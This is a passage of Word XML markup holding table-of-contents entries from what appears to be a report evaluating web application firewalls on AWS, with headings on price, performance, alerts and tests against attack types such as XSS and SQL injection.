            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3D531849" w14:textId="55F22FF8" w:rsidR="00C71C5B" w:rsidRPr="00C71C5B" w:rsidRDefault="00341E74">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:kern w:val="0"/>
              <w:sz w:val="22"/>
              <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71138489" w:history="1">
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>3.1 Network Topology</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_Toc71138489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25</w:t>
            </w:r>
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="37D76F07" w14:textId="43654374" w:rsidR="00C71C5B" w:rsidRPr="00C71C5B" w:rsidRDefault="00341E74">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:kern w:val="0"/>
              <w:sz w:val="22"/>
              <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71138490" w:history="1">
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>3.2 Infrastructure on AWS</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_Toc71138490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27</w:t>
            </w:r>
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5ECB3675" w14:textId="1C7DF222" w:rsidR="00C71C5B" w:rsidRPr="00C71C5B" w:rsidRDefault="00341E74">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:kern w:val="0"/>
              <w:sz w:val="22"/>
              <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71138491" w:history="1">
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>3.3 Onboarding of WAFs &amp; WAF Configuration</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_Toc71138491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28</w:t>
            </w:r>
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="34F51B51" w14:textId="7FA27D0B" w:rsidR="00C71C5B" w:rsidRPr="00C71C5B" w:rsidRDefault="00341E74">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:kern w:val="0"/>
              <w:sz w:val="22"/>
              <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71138492" w:history="1">
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>3.4 Test Plans</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_Toc71138492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34</w:t>
            </w:r>
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3A25D315" w14:textId="0B18F297" w:rsidR="00C71C5B" w:rsidRPr="00C71C5B" w:rsidRDefault="00341E74">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71138493" w:history="1">
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.4.1 Tools</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_Toc71138493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35</w:t>
            </w:r>
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="581FB29B" w14:textId="641A3AE3" w:rsidR="00C71C5B" w:rsidRPr="00C71C5B" w:rsidRDefault="00341E74">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71138494" w:history="1">
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.4.2 Price Comparison</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_Toc71138494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35</w:t>
            </w:r>
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5313C650" w14:textId="2CEF8154" w:rsidR="00C71C5B" w:rsidRPr="00C71C5B" w:rsidRDefault="00341E74">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71138495" w:history="1">
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.4.3 Performance</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_Toc71138495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35</w:t>
            </w:r>
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="38ABDB61" w14:textId="0E424749" w:rsidR="00C71C5B" w:rsidRPr="00C71C5B" w:rsidRDefault="00341E74">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71138496" w:history="1">
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.4.4 WAF Alerts/Usability</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_Toc71138496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37</w:t>
            </w:r>
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="340BFCCB" w14:textId="0D3F4C05" w:rsidR="00C71C5B" w:rsidRPr="00C71C5B" w:rsidRDefault="00341E74">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71138497" w:history="1">
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.4.5 Security</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_Toc71138497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38</w:t>
            </w:r>
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4AEDC872" w14:textId="46036916" w:rsidR="00C71C5B" w:rsidRPr="00C71C5B" w:rsidRDefault="00341E74">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:kern w:val="0"/>
              <w:sz w:val="22"/>
              <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71138498" w:history="1">
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>4. Results &amp; Analysis</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_Toc71138498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44</w:t>
            </w:r>
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1F2F88F2" w14:textId="2BD146FF" w:rsidR="00C71C5B" w:rsidRPr="00C71C5B" w:rsidRDefault="00341E74">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:kern w:val="0"/>
              <w:sz w:val="22"/>
              <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71138499" w:history="1">
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>4.1 Price</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_Toc71138499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44</w:t>
            </w:r>
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7DA562FC" w14:textId="33155F7A" w:rsidR="00C71C5B" w:rsidRPr="00C71C5B" w:rsidRDefault="00341E74">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:kern w:val="0"/>
              <w:sz w:val="22"/>
              <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71138500" w:history="1">
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>4.2 Performance</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_Toc71138500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44</w:t>
            </w:r>
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4CD34ACB" w14:textId="55CF44CB" w:rsidR="00C71C5B" w:rsidRPr="00C71C5B" w:rsidRDefault="00341E74">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:kern w:val="0"/>
              <w:sz w:val="22"/>
              <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71138501" w:history="1">
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>4.3 Alerts/Usability</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_Toc71138501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45</w:t>
            </w:r>
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="60E9214A" w14:textId="0890AF94" w:rsidR="00C71C5B" w:rsidRPr="00C71C5B" w:rsidRDefault="00341E74">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:kern w:val="0"/>
              <w:sz w:val="22"/>
              <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71138502" w:history="1">
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>4.4 Security</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_Toc71138502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50</w:t>
            </w:r>
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6AAF0206" w14:textId="4221E71B" w:rsidR="00C71C5B" w:rsidRPr="00C71C5B" w:rsidRDefault="00341E74">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71138503" w:history="1">
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.4.1 Cross Site Scripting (XSS)</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_Toc71138503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51</w:t>
            </w:r>
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="56EDA0D5" w14:textId="404AB826" w:rsidR="00C71C5B" w:rsidRPr="00C71C5B" w:rsidRDefault="00341E74">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71138504" w:history="1">
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.4.2 SQL injection</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_Toc71138504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51</w:t>
            </w:r>
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="753FE07F" w14:textId="1D03CE41" w:rsidR="00C71C5B" w:rsidRPr="00C71C5B" w:rsidRDefault="00341E74">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71138505" w:history="1">
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.4.3 HTML injection</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_Toc71138505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52</w:t>
            </w:r>
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2E944F2A" w14:textId="13D5E394" w:rsidR="00C71C5B" w:rsidRPr="00C71C5B" w:rsidRDefault="00341E74">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71138506" w:history="1">
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.4.5 OS command injection</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_Toc71138506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52</w:t>
            </w:r>
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0AADCECF" w14:textId="7C12DB2D" w:rsidR="00C71C5B" w:rsidRPr="00C71C5B" w:rsidRDefault="00341E74">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71138507" w:history="1">
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.4.6 PHP code injection</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_Toc71138507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54</w:t>
            </w:r>
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="48E398CA" w14:textId="19C879F0" w:rsidR="00C71C5B" w:rsidRPr="00C71C5B" w:rsidRDefault="00341E74">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71138508" w:history="1">
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.4.7 Broken authentication</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_Toc71138508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55</w:t>
            </w:r>
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5E69630F" w14:textId="403E5B38" w:rsidR="00C71C5B" w:rsidRPr="00C71C5B" w:rsidRDefault="00341E74">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:kern w:val="0"/>
              <w:sz w:val="22"/>
              <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71138509" w:history="1">
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>5. Discussion</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_Toc71138509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56</w:t>
            </w:r>
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0C0A22F3" w14:textId="74F93A37" w:rsidR="00C71C5B" w:rsidRPr="00C71C5B" w:rsidRDefault="00341E74">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:kern w:val="0"/>
              <w:sz w:val="22"/>
              <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71138510" w:history="1">
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>5.1 Price</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_Toc71138510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56</w:t>
            </w:r>
            <w:r w:rsidR="00C71C5B" w:rsidRPr="00C71C5B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7BEB7859" w14:textId="325E1C6A" w:rsidR="00C71C5B" w:rsidRPr="00C71C5B" w:rsidRDefault="00341E74">
          <w:pPr>
